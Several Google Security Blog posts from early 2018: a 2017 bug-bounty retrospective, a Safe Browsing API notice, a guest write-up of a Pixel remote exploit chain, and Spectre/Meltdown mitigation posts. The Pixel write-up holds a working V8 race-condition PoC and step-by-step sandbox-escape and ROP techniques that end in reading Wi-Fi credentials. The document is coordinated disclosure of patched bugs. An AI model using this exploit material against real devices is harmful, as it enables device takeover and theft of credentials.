As we kick off a new year, we wanted to take a moment to look back at the Vulnerability Reward Program in 2017. It joins our past retrospectives for 2014, 2015, and 2016, and shows the course our VRPs have taken.

At the heart of this blog post is a big thank you to the security research community. You continue to help make Google’s users and our products more secure. We look forward to continuing our collaboration with the community in 2018 and beyond!

2017, By the Numbers

Here’s an overview of how we rewarded researchers for their reports to us in 2017:
We awarded researchers more than 1 million dollars for vulnerabilities they found and reported in Google products, and a similar amount for Android. Combined with our Chrome awards, we awarded researchers nearly 3 million dollars overall for their reports last year.

Drilling down a bit further, we awarded $125,000 to more than 50 security researchers from all around the world through our Vulnerability Research Grants Program, and $50,000 to the hard-working folks who improve the security of open-source software as part of our Patch Rewards Program.

A few bug highlights

Every year, a few bug reports stand out: the research may have been especially clever, the vulnerability may have been especially serious, or the report may have been especially fun and quirky!

Here are a few of our favorites from 2017:

  • In August, researcher Guang Gong outlined an exploit chain on Pixel phones which combined a remote code execution bug in the sandboxed Chrome render process with a subsequent sandbox escape through Android’s libgralloc. As part of the Android Security Rewards Program, he received the largest reward of the year: $112,500. The Pixel was the only device that wasn’t exploited during last year’s annual Mobile Pwn2Own competition, and Guang’s report helped strengthen its protections even further.
  • Researcher "gzobqq" received the $100,000 Pwnium award for a chain of bugs across five components that achieved remote code execution in Chrome OS guest mode.
  • Alex Birsan discovered that anyone could have gained access to internal Google Issue Tracker data. He detailed his research here, and we awarded him $15,600 for his efforts.

Making Android and Play even safer

Over the course of the year, we continued to develop our Android and Play Security Reward programs.

No one had claimed the top reward for an Android exploit chain in more than two years, so we announced that the greatest reward for a remote exploit chain--or exploit leading to TrustZone or Verified Boot compromise--would increase from $50,000 to $200,000. We also increased the top-end reward for a remote kernel exploit from $30,000 to $150,000.


In October, we introduced the by-invitation-only Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play.


Today, we’re increasing the reward for remote code execution vulnerabilities from $1,000 to $5,000. We’re also introducing a new category that includes vulnerabilities that could result in the theft of users’ private data, information being transferred unencrypted, or bugs that result in access to protected app components. We’ll award $1,000 for these bugs. For more information visit the Google Play Security Reward Program site.


And finally, we want to give a shout out to the researchers who’ve submitted fuzzers to the Chrome Fuzzer Program: they get rewards for every eligible bug their fuzzers find without having to do any more work, or even file a bug.


Given how well things have been going these past years, we look forward to our Vulnerability Rewards Programs resulting in even more user protection in 2018 thanks to the hard work of the security research community.

* Andrew Whalley (Chrome VRP), Mayank Jain (Android Security Rewards), and Renu Chaudhary (Google Play VRP) contributed mightily to help lead these Google-wide efforts.


In May 2016, we introduced the latest version of the Google Safe Browsing API (v4). Since this launch, thousands of developers around the world have adopted the API to protect over 3 billion devices from unsafe web resources.

Coupled with that announcement was the deprecation of legacy Safe Browsing APIs, v2 and v3. Today we are announcing an official turn-down date of October 1st, 2018, for these APIs. All v2 and v3 clients must transition to the v4 API prior to this date.

To make the switch easier, an open source implementation of the Update API (v4) is available on GitHub. Android developers always get the latest version of Safe Browsing’s data and protocols via the SafetyNet Safe Browsing API. Getting started is simple; all you need is a Google Account, Google Developer Console project, and an API key.
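
As a rough illustration of the v4 style, here is the general shape of a Lookup API request (the companion to the Update API). The endpoint and field names below follow the public v4 documentation, but treat this sketch as illustrative and consult the current API reference for the authoritative schema:

POST https://safebrowsing.googleapis.com/v4/threatMatches:find?key=YOUR_API_KEY
Content-Type: application/json

{
  "client": {
    "clientId": "yourcompanyname",
    "clientVersion": "1.0"
  },
  "threatInfo": {
    "threatTypes": ["MALWARE", "SOCIAL_ENGINEERING"],
    "platformTypes": ["ANY_PLATFORM"],
    "threatEntryTypes": ["URL"],
    "threatEntries": [
      {"url": "http://example.com/some/path"}
    ]
  }
}

A response listing matches flags the URL against the requested threat lists; an empty response means no match was found.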

For questions or feedback, join the discussion with other developers on the Safe Browsing Google Group. Visit our website for the latest information on Safe Browsing.



[Cross-posted from the Android Developers Blog]

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, the highest reward in the history of the ASR program, plus $7,500 from the Chrome Rewards program, for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.
All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.
The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in the Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.
The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.
This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in the sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.0.3112.107 + Android 7.1.2 (security patch level 2017-08-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys).

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduced support for SharedArrayBuffer, a low-level mechanism for sharing memory between JavaScript workers and synchronizing control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers: a low-level, assembly-like language with a compact binary format that runs with near-native performance and gives languages such as C/C++ a compilation target so that they can run on the web. By combining these three features (SharedArrayBuffer, WebAssembly, and web workers) in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.
The buggy code is in the function GetFirstArgumentAsBytes, where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer was introduced to JavaScript, a TypedArray may be backed by a SharedArrayBuffer, so the contents of the TypedArray may be modified by other worker threads at any time.
i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}
A simple PoC is as follows:
<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })
var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);
//worker.terminate(); 
</script>
</html>
The text format of the WebAssembly code is as follows:
00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end
First, the above binary-format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray object is created using the SharedArrayBuffer as its buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to it. While the main thread is parsing the WebAssembly code, the worker thread modifies the SharedArrayBuffer at the same time. Under these circumstances, the race condition causes a TOCTOU issue: after the main thread's bounds check, the instruction "call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.
Because the "call 0" WebAssembly instruction can be modified to call any other WebAssembly function, exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped into WebAssembly memory. Because function 0 and function $leak have a different number of arguments, many useful pieces of data on the stack are leaked.
 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))
Not only can the instruction "call 0" be modified; any "call funcx" instruction can be. Assume funcx is a wasm function with six arguments, as follows. When V8 compiles funcx for the ia32 architecture, the first five arguments are passed in registers and the sixth argument is passed on the stack. All of the arguments can be set to arbitrary values from JavaScript:
/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)
/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop
Safepoints (size = 8)
RelocInfo (size = 0)
--- End code ---
When a JavaScript function calls a WebAssembly function, the V8 compiler internally creates a JS_TO_WASM function; after compilation, the JavaScript function calls the created JS_TO_WASM function, which in turn calls the WebAssembly function. JS_TO_WASM functions use a different calling convention: their first argument is passed on the stack. Suppose "call funcx" is modified to call the following JS_TO_WASM function:
/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>
The JS_TO_WASM function will take the sixth argument of funcx as its first argument, but it treats that first argument as an object pointer, so a type confusion is triggered when the argument is passed to the ToNumber function. This means we can pass any value as an object pointer to ToNumber, so we can fake an ArrayBuffer object at some address (for example, inside a double array) and pass that address to ToNumber. The layout of an ArrayBuffer is as follows:
/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      
/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11
Because the contents of the stack can be leaked, we can obtain much useful data to fake the ArrayBuffer. For example, we can leak the start address of an object and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's Properties and Elements fields.

We have to fake the Map of the ArrayBuffer too. Luckily, most of the Map's fields are not used when the bug is triggered, but the InstanceType at offset 8 has to be set to 0xc3 (this value depends on the version of V8) to indicate that the object is an ArrayBuffer. In order to get a reference to the faked ArrayBuffer in JavaScript, we also have to set the Prototype field of the Map, at offset 16, to an object whose Symbol.toPrimitive property is a JavaScript callback function. When the faked ArrayBuffer is passed to the ToNumber function to be converted to a Number, that callback is invoked, so we obtain a reference to the faked ArrayBuffer inside the callback.

Because the ArrayBuffer is faked inside a double array, the contents of the array can be set to any value, so we can change the BackingStore and ByteLength fields of the faked ArrayBuffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple: since JIT code in Chrome is readable, writable, and executable, we can overwrite it to execute shellcode.
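To make the Symbol.toPrimitive step concrete, here is a minimal standalone JavaScript sketch (hypothetical names, independent of the actual exploit) showing how numeric conversion hands control to script; this is the mechanism by which a reference to the faked ArrayBuffer is captured:

var captured = null;
var faked = {
  [Symbol.toPrimitive]() {
    captured = this;        // `this` is the object being converted to a number
    return 0;
  }
};
Number(faked);                     // ToNumber(faked) invokes the callback above
console.log(captured === faked);   // true: script now holds a reference to the object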
The Chrome team fixed this bug very quickly in Chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by a mismatch between map and unmap, which leads to a use-after-unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:
static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}
gralloc_map maps a graphic buffer, controlled by the argument handle, into memory, and gralloc_unmap unmaps it. While mapping, mappedAddress plus hnd->offset is stored into hnd->base; but while unmapping, hnd->base is passed directly to the munmap system call without the offset being subtracted. hnd->offset can be manipulated from Chrome's sandboxed process, so it's possible to unmap arbitrary pages in system_server from Chrome's sandboxed render process.
static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}
int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}
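To spell out the mismatch with concrete, hypothetical numbers: suppose the render process supplies size = 0x200000 and offset = 0x1000, and the kernel places the mapping at 0x7f54600000. A sketch of the resulting arithmetic:

// map:   mappedAddress = mmap(..., size = 0x200000, offset = 0x1000)  ->  0x7f54600000
//        hnd->base     = 0x7f54600000 + 0x1000  =  0x7f54601000
// unmap: munmap((void*)hnd->base, 0x200000)
//        -> unmaps [0x7f54601000, 0x7f54801000)
//        The final 0x1000 bytes lie past the end of the original mapping, so a page
//        of whatever system_server mapped directly above (e.g., heap) is unmapped too.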
Although SELinux restricts the isolated_app domain from accessing most Android system services, isolated_app can still access three of them:
neverallow isolated_app {
    service_manager_type
    -activity_service
    -display_service
    -webviewupdate_service
}:service_manager find;
To trigger the aforementioned use-after-unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parcelable, into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.
This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app.
To exploit this EoP bug:
1. Address space shaping. Make the address space layout look like the following, where a heap chunk sits right above several contiguous ashmem mappings:
7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f54800000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......
2. Unmap part of the heap (1KB) and part of an ashmem mapping (2MB minus 1KB) by triggering the bug:
7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)
3. Fill the unmapped space with an ashmem memory:
7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)
4. Spray the heap; the heap data will be written into the ashmem memory:
7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still managed by it and will allocate memory from this range, resulting in heap data being written into the ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)
5. Because the ashmem mapping filled in step 3 is mapped by both system_server and the render process, part of system_server's heap can now be read and written by the render process, and we can trigger system_server to allocate some GraphicBuffer objects in the ashmem. As GraphicBuffer inherits from ANativeWindowBuffer, which has a member named common of type android_native_base_t, we can read two function pointers (incRef and decRef) from the ashmem memory and then calculate the base address of the module libui. On the latest Pixel device, Chrome's render process is still a 32-bit process but system_server is a 64-bit process, so we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger the ROP. Unluckily, it seems that the pointers incRef and decRef are never actually called, so modifying them can't redirect control flow to the ROP chain; instead, we can modify the virtual table of GraphicBuffer to trigger the ROP.
typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;
    /* the sizeof() of the actual EGL native type */
    int version;
    void* reserved[4];
    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;
6. Trigger a GC to execute the ROP
When a GraphicBuffer object is destructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump into the ROP chain. When a GC happens, the control flow goes to the ROP. Finding an ROP chain within a single module (libui) is challenging, but after hard work we successfully found one and dumped the contents of the file /data/misc/wifi/wpa_supplicant.conf.

Summary

The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 security update. Supported Google devices and devices with a security patch level of 2017-12-05 or later are protected from these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate similar vulnerabilities.
The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team; many thanks to them for their effort.



Yesterday, Google’s Project Zero team posted detailed technical information on three variants of a new security issue involving speculative execution on many modern CPUs. Today, we’d like to share some more information about our mitigations and performance.

In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” -- a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.
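
As a rough sketch of the construct (simplified from the published retpoline sequence, so treat the exact listing as illustrative), an indirect branch such as "jmp *%r11" is replaced by a return-based thunk whose speculative path is trapped in a harmless loop:

  call set_up_target      ; push the address of capture_spec, jump ahead
capture_spec:
  pause                   ; speculative execution of the ret lands here...
  lfence
  jmp capture_spec        ; ...and spins safely instead of being steered by an attacker
set_up_target:
  mov %r11, (%rsp)        ; overwrite the saved return address with the real target
  ret                     ; architecturally branches to *%r11

Because the processor predicts the ret from its return stack, which points at capture_spec, speculation never follows an attacker-injected branch target.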

In addition, we have deployed Kernel Page Table Isolation (KPTI) -- a general purpose technique for better protecting sensitive information in memory from other software running on a machine -- to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.

There has been speculation that the deployment of KPTI causes significant performance slowdowns. Performance can vary, as the impact of the KPTI mitigations depends on the rate of system calls made by an application. On most of our workloads, including our cloud infrastructure, we see negligible impact on performance.

In our own testing, we have found that microbenchmarks can show an exaggerated impact. Of course, Google recommends thorough testing in your environment before deployment; we cannot guarantee any particular performance or operational impact.

Speculative Execution and the Three Methods of Attack

To follow up on yesterday’s post, today we’re also providing a summary of speculative execution and how each of the three variants works.

In order to improve performance, many CPUs may choose to speculatively execute instructions based on assumptions that are considered likely to be true. During speculative execution, the processor is verifying these assumptions; if they are valid, then the execution continues. If they are invalid, then the execution is unwound, and the correct execution path can be started based on the actual conditions. It is possible for this speculative execution to have side effects which are not restored when the CPU state is unwound, and can lead to information disclosure.

Project Zero discussed three variants of speculative execution attack. There is no single fix for all three attack variants; each requires protection independently.

  • Variant 1 (CVE-2017-5753), “bounds check bypass.” This vulnerability affects specific sequences within compiled applications, which must be addressed on a per-binary basis.
  • Variant 2 (CVE-2017-5715), “branch target injection”. This variant may either be fixed by a CPU microcode update from the CPU vendor, or by applying a software mitigation technique called “Retpoline” to binaries where concern about information leakage is present. This mitigation may be applied to the operating system kernel, system programs and libraries, and individual software programs, as needed.
  • Variant 3 (CVE-2017-5754), “rogue data cache load.” This may require patching the system’s operating system. For Linux there is a patchset called KPTI (Kernel Page Table Isolation) that helps mitigate Variant 3. Other operating systems may implement similar protections - check with your vendor for specifics.

Variant 1: bounds check bypass (CVE-2017-5753)
This attack variant allows malicious code to circumvent bounds checking features built into most binaries. Even though the bounds checks will still fail, the CPU will speculatively execute instructions after the bounds checks, which can access memory that the code could not normally access. When the CPU determines the bounds check has failed, it discards any work that was done speculatively; however, some changes to the system can be still observed (in particular, changes to the state of the CPU caches). The malicious code can detect these changes and read the data that was speculatively accessed.

The primary ramification of Variant 1 is that it is difficult for a system to run untrusted code within a process and restrict what memory within the process the untrusted code can access.

In the kernel, this has implications for systems such as the extended Berkeley Packet Filter (eBPF), which takes packet filters from user space, just-in-time (JIT) compiles the packet filter code, and runs the packet filter within the context of the kernel. The JIT compiler uses bounds checking to limit the memory the packet filter can access; however, Variant 1 allows an attacker to use speculation to circumvent these limitations.
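
The canonical shape of a Variant 1 gadget, as described in public Spectre writeups, looks roughly like the following illustrative C++ sketch (hypothetical names, not code from any particular product):

#include <cstddef>
#include <cstdint>

size_t array1_size = 16;
uint8_t array1[16];
uint8_t array2[256 * 4096];

void victim_function(size_t x) {
  if (x < array1_size) {                        // the bounds check the CPU speculates past
    uint8_t value = array1[x];                  // speculative out-of-bounds read
    volatile uint8_t t = array2[value * 4096];  // load a cache line indexed by the secret byte
    (void)t;
  }
}

After mistraining the branch predictor with in-bounds values of x, an attacker supplies an out-of-bounds x and then times loads from array2 to see which line became cached, recovering array1[x] one byte at a time.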

Mitigation requires analysis and recompilation so that vulnerable binary code is not emitted. Examples of targets which may require patching include the operating system and applications which execute untrusted code.
Variant 2: branch target injection (CVE-2017-5715)
This attack variant uses the ability of one process to influence the speculative execution behavior of code in another security context (i.e., guest/host mode, CPU ring, or process) running on the same physical CPU core.

Modern processors predict the destination for indirect jumps and calls that a program may take and start speculatively executing code at the predicted location. The tables used to drive prediction are shared between processes running on a physical CPU core, and it is possible for one process to pollute the branch prediction tables to influence the branch prediction of another process or kernel code.

In this way, an attacker can cause speculative execution of any mapped code in another process, in the hypervisor, or in the kernel, and potentially read data from the other protection domain using techniques like Variant 1. This variant is difficult to use, but has great potential power as it crosses arbitrary protection domains.
Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), or applying a software mitigation (e.g., Google's Retpoline) to the hypervisor, operating system kernel, system programs and libraries, and user applications.
Variant 3: rogue data cache load (CVE-2017-5754)
This attack variant allows a user mode process to access virtual memory as if the process was in kernel mode. On some processors, the speculative execution of code can access memory that is not typically visible to the current execution mode of the processor; i.e., a user mode program may speculatively access memory as if it were running in kernel mode.

Using the techniques of Variant 1, a process can observe the memory that was accessed speculatively. On most operating systems today, the page table that a process uses includes access to most physical memory on the system, however access to such memory is limited to when the process is running in kernel mode. Variant 3 enables access to such memory even in user mode, violating the protections of the hardware.
Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.

Mitigations for Google products

You can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.



[Google Cloud, G Suite, and Chrome customers can visit the Google Cloud blog for details about those products]
[For more technical details about this issue, please read Project Zero's blog post]

Last year, Google’s Project Zero team discovered serious security flaws caused by “speculative execution,” a technique used by most modern processors (CPUs) to optimize performance.

The Project Zero researcher, Jann Horn, demonstrated that malicious actors could take advantage of speculative execution to read system memory that should have been inaccessible. For example, an unauthorized party may read sensitive information in the system’s memory such as passwords, encryption keys, or sensitive information open in applications. Testing also showed that an attack running on one virtual machine was able to access the physical memory of the host machine, and through that, gain read-access to the memory of a different virtual machine on the same host.

These vulnerabilities affect many CPUs, including those from AMD, ARM, and Intel, as well as the devices and operating systems running on them.

As soon as we learned of this new class of attack, our security and product development teams mobilized to defend Google’s systems and our users’ data. We have updated our systems and affected products to protect against this new type of attack. We also collaborated with hardware and software manufacturers across the industry to help protect their users and the broader web. These efforts have included collaborative analysis and the development of novel mitigations.

We are posting before an originally coordinated disclosure date of January 9, 2018 because of existing public reports and growing speculation in the press and security research community about the issue, which raises the risk of exploitation. The full Project Zero report is forthcoming (update: this has been published; see above).

Mitigation status for Google products

